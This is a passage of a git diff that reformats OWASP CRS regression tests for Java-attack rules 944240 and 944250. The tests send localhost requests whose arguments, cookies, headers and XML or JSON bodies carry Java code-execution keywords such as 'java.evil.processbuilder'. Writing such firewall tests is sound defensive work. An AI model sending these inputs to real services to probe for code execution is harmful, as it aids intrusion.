User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 81 desc: "Cookie name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 82 desc: "Request header test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: 
runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 83 desc: "XML attribute value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 84 desc: "XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 85 desc: "Nested XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 86 desc: "Content-Type text/plain includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.whileclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log: + expect_ids: [944240] + - 
test_id: 88 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.whileclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log: + expect_ids: [944240] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index b8b744b16..b9aa24729 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml 
@@ -1,453 +1,451 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944250.yaml" - description: "Positive tests for rule 944250" +rule_id: 944250 tests: - - test_title: 944250-1 + - test_id: 1 desc: "Argument test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 2 desc: "Argument name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log: + expect_ids: [944250] + - test_id: 3 desc: "Cookie test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 4 desc: "Cookie name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 5 desc: "Request header test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 6 desc: "XML attribute value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944250] + - test_id: 7 desc: "XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 8 desc: "Nested XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 9 desc: "Content-Type text/plain includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword java.evil.runtime" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.runtime\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log: + expect_ids: [944250] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.runtime\": \"test\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"{\"java.evil.runtime\": \"test\"}" + output: + log: + expect_ids: [944250] + - test_id: 12 desc: "Argument test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 13 desc: "Argument name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log: + expect_ids: [944250] + - test_id: 14 desc: "Cookie test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 15 desc: "Cookie name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.processbuilder=test - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 16 desc: "Request header test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 17 desc: "XML attribute value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944250] + - test_id: 18 desc: "XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 19 desc: "Nested XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 20 desc: "Content-Type text/plain includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 